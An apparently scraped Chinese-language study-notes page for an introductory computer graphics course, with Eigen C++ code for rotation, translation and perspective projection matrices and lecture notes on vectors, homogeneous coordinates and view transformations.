    i << 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0;
    j << 2.0, 3.0, 1.0, 4.0, 6.0, 5.0, 9.0, 7.0, 8.0;
    // matrix output
    std::cout << "Example of output \n";
    std::cout << i << std::endl;
    // matrix add i + j
    // matrix scalar multiply i * 2.0
    // matrix multiply i * j
    // matrix multiply vector i * v

    return 0;
    }

    题目

    给定一个点 $P=(2,1)$, 将该点绕原点先逆时针旋转 $45^\circ$,再平移
    $(1,2)$,计算出变换后点的坐标(要求用齐次坐标进行计算)。


    $P$ 以齐次坐标的表示形式为 $(2, 1, 1)^T$

    旋转矩阵为 $R(\pi/4)=\begin{bmatrix}\cos \pi/4 & -\sin \pi/4 & 0 \\sin \pi/4 & \cos \pi/4 & 0 \0 & 0 & 1 \end{bmatrix}$

    平移矩阵 $T(1, 2)=\begin{bmatrix}1 & 0 & 1 \0 & 1 & 2 \0 & 0 & 1\end{bmatrix}$

    最终坐标为 $TRP$。

    #include<cmath>
    #include<eigen3/Eigen/Core>
    #include<eigen3/Eigen/Dense>
    #include<iostream>
    #define PI 3.1415926535
    using namespace std;
    using namespace Eigen;

    int main()
    {
    float theta = PI / 4.0f;
    Vector3f P(2.0f, 1.0f, 1.0f);
    Matrix3f R, T;
    R <<
    cos(theta), -sin(theta), 0,
    sin(theta), cos(theta), 0,
    0, 0, 1;
    T <<
    1, 0, 1,
    0, 1, 2,
    0, 0, 1;
    cout << T * R * P << endl;
    return 0;
    }
    1.70711
    4.12132
    1

    HW1

    本次作业的任务是填写一个旋转矩阵和一个透视投影矩阵。给定三维下三个点 $v_0(2.0, 0.0,−2.0)$, $v_1(0.0, 2.0,−2.0)$, $v_2(−2.0, 0.0,−2.0)$, 你需要将这三个点的坐标变换为屏幕坐标并在屏幕上绘制出对应的线框三角形(在代码框架中,我们已经提供了draw_triangle 函数,所以你只需要去构建变换矩阵即可)。

    • get_model_matrix(float rotation_angle): 逐个元素地构建模型变换矩阵并返回该矩阵。

    代公式:$$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\sin\alpha&\cos\alpha&0&0\0&0&1&0\0&0&0&1\end{pmatrix}$$

    Eigen::Matrix4f get_model_matrix(float rotation_angle)
    {
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the model matrix for rotating the triangle around the Z axis.
    // Then return it.

    float angle = rotation_angle * MY_PI / 180.0f;

    Eigen::Matrix4f translate;
    translate << std::cos(angle), -std::sin(angle), 0, 0,
    std::sin(angle), std::cos(angle), 0, 0,
    0, 0, 1, 0,
    0, 0, 0, 1;
    model = translate * model;
    return model;
    }
    • get_projection_matrix(float eye_fov, float aspect_ratio, float zNear, float zFar): 使用给定的参数逐个元素地构建透视投影矩阵并返回该矩阵。

    代公式:$\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$

    其中:

    $M_{persp\to ortho}$,映射到“规范(正则、规范、标准)” 的立方体 $[-1,1]^3$,因此:

    $M_{persp\to ortho}=\begin{bmatrix}\mathrm{zNear}&0&0&0\0&\mathrm{zNear}&0&0\0&0&\mathrm{zNear}+\mathrm{zFar}&-\mathrm{zNear}\times\mathrm{zFar}\0&0&1&0\end{bmatrix}$


    $M_{ortho}=\begin{bmatrix}\frac2{r-l}&0&0&0\0&\frac2{t-b}&0&0\0&0&\frac2{n-f}&0\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}2\0&1&0&-\frac{t+b}2\0&0&1&-\frac{n+f}2\0&0&0&1\end{bmatrix}$

    png

    具体地,如上图,zNear 即为 $n$,zFar 即为 $z$,$\frac yz=\tan{(\mathrm{eye_fov}/2)}$。

    由于右手坐标系 $n$ 和 $f$ 为负,因此:

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    最后 $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$ 即为所求。

    完整代码:

    Eigen::Matrix4f get_projection_matrix(float eye_fov, float aspect_ratio,
    float zNear, float zFar)
    {
    // Students will implement this function

    Eigen::Matrix4f projection = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the projection matrix for the given parameters.
    // Then return it.

    Eigen::Matrix4f M_P;
    M_P << zNear, 0, 0, 0,
    0, zNear, 0, 0,
    0, 0, zNear + zFar, -(zNear * zFar),
    0, 0, 1, 0;

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    Eigen::Matrix4f M_T;
    M_T << 1, 0, 0, -(r + l) / 2,
    0, 1, 0, -(t + b) / 2,
    0, 0, 1, -(n + f) / 2,
    0, 0, 0, 1;

    Eigen::Matrix4f M_S;
    M_S << 2 / (r - l), 0, 0, 0,
    0, 2 / (t - b), 0, 0,
    0, 0, 2 / (f - n), 0,
    0, 0, 0, 1;

    projection = M_T * M_S * M_P * projection;
    return projection;
    }

    运行时:

    • n = -0.1
    • f = -50
    • t = -0.0414214
    • b = 0.0414214
    • r = -0.0414214
    • l = 0.0414214

    提高项:在 main.cpp 中构造一个函数,该函数的作用是得到绕任意
    过原点的轴的旋转变换矩阵。Eigen::Matrix4f get_rotation(Vector3f axis, float angle)

    代公式:$$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\n_z&0&-n_x\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

    Eigen::Matrix4f get_rotation(Vector3f axis, float angle)
    {
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    float alpha = angle * MY_PI / 180.0f;
    float nx = axis[0];
    float ny = axis[1];
    float nz = axis[2];
    Eigen::Matrix3f M;
    M <<
    0, -nz, ny,
    nz, 0, -nx,
    -ny, nx, 0;
    Eigen::Matrix3f R = std::cos(alpha) * Eigen::Matrix3f::Identity() + (1 - std::cos(alpha)) * axis * axis.transpose() + std::sin(alpha) * M;
    Eigen::Matrix4f translate = Eigen::Matrix4f::Identity();
    translate.block<3, 3>(0, 0) = R;

    model = translate * model;
    return model;
    }
    ]]>
    + 资源

    课程

    Lecture 01 Overview of Computer Graphics

What is Computer Graphics? 图形学的应用:

• Video Games 游戏

    • Movies 电影特效

    • Animations 动画

    • Design 设计

    • Visualization 可视化

• Virtual Reality 虚拟现实

    • Augmented Reality 增强现实

• Digital Illustration 数字插画

    • Simulation 模拟

    • Graphical User Interfaces, GUI 图形用户接口

    • Typography 字体


    Why study Computer Graphics?

    • Computer Graphics is AWESOME!

    Course Topics(mainly 4 parts)

    • Rasterization 光栅化

      • Project geometry primitives (3D triangles / polygons) onto the screen 将几何图元(三维三角形/多边形)投影到屏幕上
      • Break projected primitives into fragments (pixels) 将投影基元分解为片段(像素)
      • Gold standard in Video Games (Real-time Applications) 视频游戏(实时应用)的黄金标准
• Curves and Meshes 曲线和网格

      • How to represent geometry in Computer Graphics 如何在计算机图形学中表示几何图形
    • Ray Tracing 光线追踪

• Shoot rays from the camera through each pixel 从相机经过每个像素发射光线
        • Calculate intersection and shading 计算交点和着色
        • Continue to bounce the rays till they hit light sources 继续反射光线,直到光线碰到光源
        • Gold standard in Animations / Movies (Offline Applications) 动画/电影黄金标准(离线应用程序)
    • Animation / Simulation 动画 / 模拟

      • Key frame Animation 关键帧动画
      • Mass-spring System 质量弹簧系统

    计算机图形学、计算机视觉、数字图像处理的区别:

    png

    Lecture 02 Review of Linear Algebra

    A Swift and Brutal Introduction to Linear Algebra! 一份对线性代数的迅速直接的介绍!

    Graphics’ Dependencies 图形相关的依赖项

    • Basic mathematics 基础数学

      • Linear algebra, calculus, statistics 线性代数、微积分、统计学
    • Basic physics 基础物理学

      • Optics, Mechanics 光学、力学
    • Misc 杂项

      • Signal processing 信号处理

      • Numerical analysis 数值分析

    • And a bit of aesthetics 还有一点美学

    This Course

    • More dependent on Linear Algebra 更多依赖于线性代数
      • Vectors (dot products, cross products, …) 向量(点积、叉积等)
      • Matrices (matrix-matrix, matrix-vector mult., …) 矩阵(矩阵相乘、矩阵与向量相乘等)
    • For example,
      • A point is a vector? 一个点是一个向量吗?
      • An operation like translating or rotating objects can be matrix-vector multiplication 类似平移或旋转物体的操作可以通过矩阵与向量相乘实现

    Vectors

    • 通常被写作 $\vec{a}$ 或 $\boldsymbol{a}$

    • 向量的长度被写作 $\left|\left|\vec{a}\right|\right|$

    • 向量的归一化,方向不变,长度设为 1:$\hat{a}=\vec{a}/|\vec{a}|$

    Cartesian Coordinates 笛卡尔坐标系

$$\mathbf{A}=\begin{pmatrix}x\\y\end{pmatrix}$$

$$\mathbf{A}^T=\left(x,y\right)$$

$$||\mathbf{A}||=\sqrt{x^2+y^2}$$

    Dot (scalar) Product 向量点乘

    $$\vec{a}\cdot\vec{b}=|\vec{a}||\vec{b}|\cos\theta $$

    $$\begin{aligned}\cos\theta&=\frac{\vec a\cdot\vec b}{|\vec a||\vec b|}\end{aligned}$$

    对于 Unit Vectors 单位向量:

    $$\cos\theta=\hat{a}\cdot\hat{b}$$

    性质:

    交换律:$\vec{a}\cdot\vec{b}=\vec{b}\cdot\vec{a}$

    分配律:$\vec{a}\cdot(\vec{b}+\vec{c})=\vec{a}\cdot\vec{b}+\vec{a}\cdot\vec{c}$

    结合律:$(k\vec{a})\cdot\vec{b}=\vec{a}\cdot(k\vec{b})=k(\vec{a}\cdot\vec{b})$

    Dot Product in Cartesian Coordinates 笛卡尔坐标系下的向量点乘

    Component-wise multiplication, then adding up 分量逐个相乘,然后求和

    • In 2D

  • $\vec{a}\cdot\vec{b}=\begin{pmatrix}x_a\\y_a\end{pmatrix}\cdot\begin{pmatrix}x_b\\y_b\end{pmatrix}=x_ax_b+y_ay_b$
• In 3D

  • $\vec a\cdot\vec b=\begin{pmatrix}x_a\\y_a\\z_a\end{pmatrix}\cdot\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}=x_ax_b+y_ay_b+z_az_b$

    Dot Product in Graphics 向量点乘在图形学中的应用

    • Find angle between two vectors (e.g. cosine of angle between light source and surface) 寻找两个向量之间的夹角,例如光源和表面之间的夹角的余弦值。

    • Finding projection of one vector on another 找到一个向量在另一个向量上的投影。

      • $\vec{b}_{\perp}$:$\vec{b}$ 在 $\vec{a}$ 方向的投影。
        • $\vec{b}_{\perp}$ 必须与 $\vec{a}$ 或 $\hat{a}$ 平行。
      • $\vec{b}_{\perp}=k\hat{a},\ k=|\vec{b}_{\perp}|=|\vec{b}|\cos\theta$
    • Measure how close two directions are 测量两个方向之间的接近程度

    • Decompose a vector 分解一个向量

    • Determine forward / backward 确定正向/反向
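As a quick check of the first two uses above, here is a minimal Eigen sketch (the vector values are demo assumptions, not from the course code): computing the angle via the dot product, and projecting $\vec b$ onto $\vec a$:

#include <cmath>
#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    Eigen::Vector3f a(1.0f, 0.0f, 0.0f);           // demo vectors
    Eigen::Vector3f b(1.0f, 1.0f, 0.0f);
    // cos(theta) = a.b / (|a||b|); for unit vectors this is just a.b
    float cosTheta = a.dot(b) / (a.norm() * b.norm());
    std::cout << std::acos(cosTheta) * 180.0f / std::acos(-1.0f) << " deg\n";
    // projection of b onto a: b_perp = (b . a_hat) a_hat
    Eigen::Vector3f aHat = a.normalized();
    Eigen::Vector3f bPerp = b.dot(aHat) * aHat;
    std::cout << bPerp.transpose() << std::endl;
    return 0;
}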

    Cross (vector) Product 矢量积

    png

    • Cross product is orthogonal to two initial vectors 叉乘结果与两个初始向量垂直
    • Direction determined by right-hand rule 方向由右手定则确定
    • Useful in constructing coordinate systems (later) 在构建坐标系时非常有用

    性质:

    对于右手坐标系:

    $$\vec{x}\times\vec{y}=+\vec{z}$$

    $$\vec{y}\times\vec{x}=-\vec{z}$$

    $$\vec{y}\times\vec{z}=+\vec{x}$$

    $$\vec{z}\times\vec{y}=-\vec{x}$$

    $$\vec{z}\times\vec{x}=+\vec{y}$$

    $$\vec{x}\times\vec{z}=-\vec{y}$$

    不满足交换律:$\vec{a}\times\vec{b}=-\vec{b}\times\vec{a}$

    跟自身叉乘为零向量:$\vec{a}\times\vec{a}=\vec{0}$

    满足分配律:

    $\vec{a}\times(\vec{b}+\vec{c})=\vec{a}\times\vec{b}+\vec{a}\times\vec{c}$

    $\vec{a}\times(k\vec{b})=k(\vec{a}\times\vec{b})$

    Cross Product: Cartesian Formula? 矢量积在笛卡尔坐标系中

$$\vec{a}\times\vec{b}=\begin{pmatrix}y_az_b-y_bz_a\\z_ax_b-x_az_b\\x_ay_b-y_ax_b\end{pmatrix}$$

$$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\\z_a&0&-x_a\\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}$$

$A^*$ 是 $\vec{a}$ 的对偶矩阵(一个反对称矩阵),用它左乘即可实现叉乘。

    Cross Product in Graphics 矢量积在图形学中的应用

    • Determine left / right 判别左右
    • Determine inside / outside 判别内外
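A sketch of how these two tests work (demo values, not the course framework): the sign of the $z$ component of the cross product tells left/right of a directed edge, and a point is inside a triangle iff it lies on the same side of all three edges:

#include <eigen3/Eigen/Dense>
#include <iostream>

// Sign of the z component of (p1 - p0) x (q - p0): positive means q lies to
// the left of the directed edge p0 -> p1 (right-hand rule).
float side(const Eigen::Vector3f& p0, const Eigen::Vector3f& p1, const Eigen::Vector3f& q)
{
    return (p1 - p0).cross(q - p0).z();
}

int main()
{
    Eigen::Vector3f a(0, 0, 0), b(1, 0, 0), c(0, 1, 0);  // a CCW triangle in the xy plane
    Eigen::Vector3f q(0.2f, 0.2f, 0.0f);
    // q is inside iff it is on the same (left) side of all three edges
    bool inside = side(a, b, q) > 0 && side(b, c, q) > 0 && side(c, a, q) > 0;
    std::cout << (inside ? "inside" : "outside") << std::endl;
    return 0;
}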

    Orthonormal Bases / Coordinate Frames 正交基 / 坐标系

    构建右手坐标系:

    $$|\vec{u}|=|\vec{v}|=|\vec{w}|=1$$

    $$\vec{u}\cdot\vec{v}=\vec{v}\cdot\vec{w}=\vec{u}\cdot\vec{w}=0$$

    $$\vec{w}=\vec{u}\times\vec{v}$$

    $$\vec p=(\vec p\cdot\vec u)\vec u+(\vec p\cdot\vec v)\vec v+(\vec p\cdot\vec w)\vec w$$
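A small Eigen sketch of building such a right-handed frame from two rough directions and then decomposing a point by dot products (the input vectors are demo assumptions):

#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    // Two rough, non-parallel input directions (demo values)
    Eigen::Vector3f look(1.0f, 0.0f, 1.0f), up(0.0f, 1.0f, 0.0f);
    Eigen::Vector3f u = look.normalized();
    Eigen::Vector3f v = (up - up.dot(u) * u).normalized();  // make up orthogonal to u
    Eigen::Vector3f w = u.cross(v);                         // w = u x v, right-handed
    // decompose an arbitrary point into the frame via dot products
    Eigen::Vector3f p(1.0f, 2.0f, 3.0f);
    std::cout << p.dot(u) << " " << p.dot(v) << " " << p.dot(w) << std::endl;
    return 0;
}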

    Matrix 矩阵

    Matrix-Matrix Multiplication 矩阵乘法

一般不满足交换律(一般 $AB\ne BA$)

    满足结合律和分配律:

    • $(AB)C=A(BC)$
    • $A(B+C)=AB+AC$
    • $(A+B)C=AC+BC$

$$(AB)^T=B^TA^T$$

Identity Matrix 单位矩阵

$$I_{3\times3}=\begin{pmatrix}1&0&0\\0&1&0\\0&0&1\end{pmatrix}$$

$$AA^{-1}=A^{-1}A=I$$

$$(AB)^{-1}=B^{-1}A^{-1}$$

    Vector multiplication in Matrix form 向量与矩阵相乘

    • Dot product 点乘

    $$\vec{a}\cdot\vec{b}=\vec{a}^T\vec{b}$$

$$=\begin{pmatrix}x_a&y_a&z_a\end{pmatrix}\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}=\begin{pmatrix}x_ax_b+y_ay_b+z_az_b\end{pmatrix}$$

• Cross product 叉乘

$$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\\z_a&0&-x_a\\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}$$

    Lecture 03 Transformation

    2D Transform 二维变换

    Scale Transform 缩放

    等比缩放:

$$x^{\prime}=sx$$

$$y^{\prime}=sy$$

用矩阵乘法表示:

$$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}s&0\\0&s\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Scale (Non-Uniform) 任意缩放

$$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}s_x&0\\0&s_y\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Reflection Matrix 镜像

    Horizontal reflection 水平镜像:

    $$x^{\prime}=-x$$

    $$y^{\prime}=y$$

    用矩阵乘法表示:

$$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}-1&0\\0&1\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Shear Matrix 斜切:

    png

    Hints:

    • Horizontal shift is $0$ at $y=0$
    • Horizontal shift is $a$ at $y=1$
    • Vertical shift is always $0$

$$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}1&a\\0&1\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Rotation Matrix 旋转

$$\mathbf{R}_\theta=\begin{bmatrix}\cos\theta&-\sin\theta\\\sin\theta&\cos\theta\end{bmatrix}$$

旋转相反的角等于矩阵的逆,等于矩阵的转置:

旋转矩阵是正交矩阵

$$\mathbf{R}_{-\theta}=\mathbf{R}_{\theta}^{-1}=\mathbf{R}_{\theta}^{T}$$

    Linear Transforms = Matrices 线性变换 = 矩阵

    $$x^{\prime}=ax+by$$

    $$y^{\prime}=cx+dy$$

$$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}a&b\\c&d\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    简写为:

    $$\mathbf{x}^{\prime}=\mathbf{M}\mathbf{x}$$

    Translation 平移

    $$x^{\prime}=x+t_x$$

    $$y^{\prime}=y+t_y$$

    Why Homogeneous Coordinates 为什么引入齐次坐标

    • Translation cannot be represented in matrix form 平移变换不能用矩阵来表示

$$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}a&b\\c&d\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}+\begin{bmatrix}t_x\\t_y\end{bmatrix}$$

    因此,平移变换不是线性变换!

    • But we don’t want translation to be a special case 但我们不希望平移变换成为特例

    • Is there a unified way to represent all transformations? (and what’s the cost?) 用统一的方式描述所有变换?(代价是什么?)

    Solution: Homogenous Coordinates 解决办法:齐次坐标

    Add a third coordinate (w-coordinate) 增加一个维度

    • 2D point = $(x, y, {\color{Red}1})^T$
    • 2D vector = $(x, y, {\color{Red}0})^T$

    Matrix representation of translations 用矩阵描述所有变换

$$\begin{pmatrix}x'\\y'\\w'\end{pmatrix}=\begin{pmatrix}1&0&t_x\\0&1&t_y\\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\\y\\1\end{pmatrix}=\begin{pmatrix}x+t_x\\y+t_y\\1\end{pmatrix}$$

    Valid operation if w-coordinate of result is 1 or 0 所增加维度的值不是 1 就是 0,这是因为:

    • vector + vector = vector
    • point – point = vector
    • point + vector = point
    • point + point = 它们的中点

    因此定义,在齐次坐标中:

$$\begin{pmatrix}x\\y\\w\end{pmatrix}\text{ is the 2D point }\begin{pmatrix}x/w\\y/w\\1\end{pmatrix},w\neq0$$

    Affine Transformation 仿射变换

    Affine map = linear map + translation 仿射变换 = 线性变换 + 平移

$$\begin{pmatrix}x^{\prime}\\y^{\prime}\end{pmatrix}=\begin{pmatrix}a&b\\c&d\end{pmatrix}\cdot\begin{pmatrix}x\\y\end{pmatrix}+\begin{pmatrix}t_x\\t_y\end{pmatrix}$$

Using homogenous coordinates: 使用齐次坐标

$$\begin{pmatrix}x'\\y'\\1\end{pmatrix}=\begin{pmatrix}a&b&t_x\\c&d&t_y\\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\\y\\1\end{pmatrix}$$

    2D Transformations 2D 变换

    Scale 缩放

$$\mathbf{S}(s_x,s_y)=\begin{pmatrix}s_x&0&0\\0&s_y&0\\0&0&1\end{pmatrix}$$

Rotation 旋转

$$\mathbf{R}(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0\\\sin\alpha&\cos\alpha&0\\0&0&1\end{pmatrix}$$

Translation 平移

$$\mathbf{T}(t_x,t_y)=\begin{pmatrix}1&0&t_x\\0&1&t_y\\0&0&1\end{pmatrix}$$

    Inverse Transform 逆变换

    $$\mathbf{M^{-1}}$$

    Composing Transforms 复合变换

    Sequence of affine transforms $A_1, A_2, A_3, …$ 对于仿射变换序列 $A_1, A_2, A_3, …$

    • Compose by matrix multiplication 通过矩阵乘法进行合成
      • Very important for performance! 对性能非常重要!

$$A_n(\ldots A_2(A_1(\mathbf{x})))=\mathbf{A}_n\cdots\mathbf{A}_2\cdot\mathbf{A}_1\cdot\begin{pmatrix}x\\y\\1\end{pmatrix}$$

    预乘 $n$ 个矩阵以获得表示组合变换的单个矩阵。

    Decomposing Complex Transforms 分解复合变换

    png

    How to rotate around a given point $c$? 如何绕空间任意一点 $c$ 旋转?

    1. Translate center to origin 平移回原点
    2. Rotate 旋转
    3. Translate back 平移回去

$$\mathbf{T}(\mathbf{c})\cdot\mathbf{R}(\alpha)\cdot\mathbf{T}(-\mathbf{c})$$
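As a concrete check, a minimal Eigen sketch of this translate / rotate / translate-back composition, rotating the point $(2,1)$ by $90^\circ$ around $c=(1,1)$ (the values are demo assumptions):

#include <cmath>
#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    float alpha = std::acos(-1.0f) / 2.0f;         // 90 degrees
    Eigen::Vector2f c(1.0f, 1.0f);                 // rotation center (demo value)
    Eigen::Matrix3f T, Tinv, R;
    Tinv << 1, 0, -c.x(), 0, 1, -c.y(), 0, 0, 1;   // 1. move c to the origin
    R << std::cos(alpha), -std::sin(alpha), 0,     // 2. rotate
         std::sin(alpha),  std::cos(alpha), 0,
         0, 0, 1;
    T << 1, 0, c.x(), 0, 1, c.y(), 0, 0, 1;        // 3. move back
    Eigen::Vector3f p(2.0f, 1.0f, 1.0f);           // point (2, 1) in homogeneous coords
    std::cout << T * R * Tinv * p << std::endl;    // -> (1, 2, 1)
    return 0;
}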

    3D Transforms

    Use homogeneous coordinates again 再次使用齐次坐标:

    • 3D point = $(x, y, z, {\color{Red}1})^T$
    • 3D vector = $(x, y, z, {\color{Red}0})^T$

    In general, $(x, y, z, w) (w \ne 0)$ is the 3D point:

    $$(x/w, y/w, z/w)$$

    3D Transformations 3D 变换

    Use $4\times 4$ matrices for affine transformations 使用 $4\times 4$ 齐次坐标表示:

$$\begin{pmatrix}x'\\y'\\z'\\1\end{pmatrix}=\begin{pmatrix}a&b&c&t_x\\d&e&f&t_y\\g&h&i&t_z\\0&0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\\y\\z\\1\end{pmatrix}$$

    先应用线性变换,再平移。

    Lecture 04 Transformation Cont.

    Viewing (观测) transformation

    • View (视图) / Camera transformation
    • Projection (投影) transformation
    • Orthographic (正交) projection
    • Perspective (透视) projection

    3D Transformations 3D 变换

    Rotation around $x$-, $y$-, or $z$-axis 沿 $x$、$y$、$z$ 轴旋转:

    png

$$\mathbf{R}_x(\alpha)=\begin{pmatrix}1&0&0&0\\0&\cos\alpha&-\sin\alpha&0\\0&\sin\alpha&\cos\alpha&0\\0&0&0&1\end{pmatrix}$$

$$\mathbf{R}_y(\alpha)=\begin{pmatrix}\cos\alpha&0&\sin\alpha&0\\0&1&0&0\\-\sin\alpha&0&\cos\alpha&0\\0&0&0&1\end{pmatrix}$$

$$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\\sin\alpha&\cos\alpha&0&0\\0&0&1&0\\0&0&0&1\end{pmatrix}$$

    Compose any 3D rotation from $\mathbf{R}_x$, $\mathbf{R}_y$, $\mathbf{R}_z$? 让 $\mathbf{R}_x$, $\mathbf{R}_y$, $\mathbf{R}_z$ 构成任意三维旋转?

    $$\mathbf{R}_{xyz}(\alpha,\beta,\gamma)=\mathbf{R}_x(\alpha)\mathbf{R}_y(\beta)\mathbf{R}_z(\gamma)$$

    • So-called Euler angles 所谓的欧拉角
    • Often used in flight simulators: roll, pitch, yaw 常用于飞行模拟器:滚转、俯仰、偏航
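A quick Eigen sketch of composing the three single-axis rotations into $\mathbf{R}_{xyz}$ (the angles are arbitrary demo values; Eigen's AngleAxisf builds each axis rotation):

#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    float a = 0.1f, b = 0.2f, g = 0.3f;            // demo roll/pitch/yaw angles in radians
    Eigen::Matrix3f Rx = Eigen::AngleAxisf(a, Eigen::Vector3f::UnitX()).toRotationMatrix();
    Eigen::Matrix3f Ry = Eigen::AngleAxisf(b, Eigen::Vector3f::UnitY()).toRotationMatrix();
    Eigen::Matrix3f Rz = Eigen::AngleAxisf(g, Eigen::Vector3f::UnitZ()).toRotationMatrix();
    std::cout << Rx * Ry * Rz << std::endl;        // R_xyz(alpha, beta, gamma)
    return 0;
}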

    png

Rodrigues’ Rotation Formula 罗德里格斯旋转公式

绕轴 $\mathbf{n}=(n_x,n_y,n_z)$ 旋转角度 $\alpha$:

$$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\\n_z&0&-n_x\\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

    View / Camera Transformation 视图变换

    • What is view transformation? 什么是视图变换?
    • Think about how to take a photo 考虑拍照
      • Find a good place and arrange people (model transformation) 摆好场景:模型变换
      • Find a good “angle” to put the camera (view transformation) 选好视角:视图变换
      • Cheese! (projection transformation) 拍照:投影变换
    • How to perform view transformation? 如何进行视图变换?
      • Define the camera first 首先定义一个相机
        • Position 位置 $\vec{e}$
        • Look-at / gaze direction 注视/凝视方向 $\hat g$
        • Up direction 上方向 $\hat t$

    png

    • Key observation 重点观察

      • If the camera and all objects move together, the “photo” will be the same 如果相机和所有物体一起移动,“照片”将是相同的
    • How about that we always transform the camera to 不如我们总是把相机变成

      • The origin, up at $Y$, look at $-Z$ 处于原点,上方为 $Y$ 轴,看着 $-Z$ 轴方向
      • And transform the objects along with the camera 并随相机变换对象
    • Transform the camera by $M_{view}$

    • So it’s located at the origin, up at $Y$, look at $-Z$ 所以它位于原点,向上看 $Y$,看 $-Z$

    • $M_{view}$ in math? $M_{view}=R_{view}T_{view}$

      • Translates $e$ to origin

        $T_{view}=\begin{bmatrix}1&0&0&-x_e\\0&1&0&-y_e\\0&0&1&-z_e\\0&0&0&1\end{bmatrix}$

      • Rotates $g$ to $-Z$、Rotates $t$ to $Y$、Rotates ($g \times t$) To $X$

        • Difficult to write! 将 $g$ 旋转到 $-Z$ 轴、将 $t$ 旋转到 $Y$ 轴、将 ($g \times t$) 旋转到 $X$ 轴,描述成矩阵是很复杂的!

        • 考虑求其逆变换

          $R_{view}^{-1}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&x_{t}&x_{-g}&0\\y_{\hat{g}\times\hat{t}}&y_{t}&y_{-g}&0\\z_{\hat{g}\times\hat{t}}&z_{t}&z_{-g}&0\\0&0&0&1\end{bmatrix}$

        • 由于旋转矩阵是正交矩阵,其逆为它的转置,因此易求得 $R_{view}$

          $R_{view}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&y_{\hat{g}\times\hat{t}}&z_{\hat{g}\times\hat{t}}&0\\x_t&y_t&z_t&0\\x_{-g}&y_{-g}&z_{-g}&0\\0&0&0&1\end{bmatrix}$

    • Summary 总结

      • Transform objects together with the camera 与摄影机一起变换对象
      • Until camera’s at the origin, up at $Y$, look at $-Z$ 直到相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向。
    • Also known as ModelView Transformation 也称为 ModelView 变换
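Putting the two pieces together, here is a minimal sketch of $M_{view}=R_{view}T_{view}$ in Eigen (the helper name get_view_matrix and its demo inputs are my own, not part of the assignment framework):

#include <eigen3/Eigen/Dense>
#include <iostream>

// e = eye position, g = gaze direction, t = up direction
Eigen::Matrix4f get_view_matrix(Eigen::Vector3f e, Eigen::Vector3f g, Eigen::Vector3f t)
{
    g.normalize();
    t.normalize();
    Eigen::Vector3f gxt = g.cross(t);              // g x t maps to +X
    Eigen::Matrix4f R = Eigen::Matrix4f::Identity();
    R.block<1, 3>(0, 0) = gxt.transpose();         // rows of R_view (transpose of R_view^{-1})
    R.block<1, 3>(1, 0) = t.transpose();
    R.block<1, 3>(2, 0) = (-g).transpose();
    Eigen::Matrix4f T = Eigen::Matrix4f::Identity();
    T.block<3, 1>(0, 3) = -e;                      // translate e to the origin
    return R * T;
}

int main()
{
    Eigen::Matrix4f V = get_view_matrix(Eigen::Vector3f(0, 0, 5),
                                        Eigen::Vector3f(0, 0, -1),
                                        Eigen::Vector3f(0, 1, 0));
    std::cout << V << std::endl;                   // here R is identity, so V just moves z by -5
    return 0;
}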

    Projection Transformation 投影变换

    • Projection in Computer Graphics 投影在计算机图形学
      • 3D to 2D
      • Orthographic projection 正交投影
      • Perspective projection 透视投影

    png

    Orthographic Projection 正交投影

